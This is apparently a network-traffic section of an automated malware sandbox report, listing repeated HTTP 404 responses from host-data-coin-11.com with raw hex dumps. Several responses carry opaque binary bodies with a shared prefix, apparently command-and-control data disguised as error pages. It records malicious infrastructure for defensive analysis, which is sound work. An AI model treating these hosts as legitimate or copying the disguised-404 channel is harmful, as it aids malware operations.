                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 55 3f 41 be f2 d8 fc fb 42 f4 53 cd 76 bb 44 10 99 04 e1 fa 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OU?ABSvDg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Jan 2022 18:32:26 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Jan 2022 18:32:28 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df b7 82 16 95 2d ec 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%-0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e9 a1 88 70 bc 57 dd 43 d7 fd 24 84 27 ed c3 97 55 2a f8 e3 00 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 45I:82OR&:UPJ%9FpWC$'U*~0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df 94 85 29 87 13 c7 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%)0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df 94 85 29 87 13 c7 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%)0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b4 9f 42 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%B0
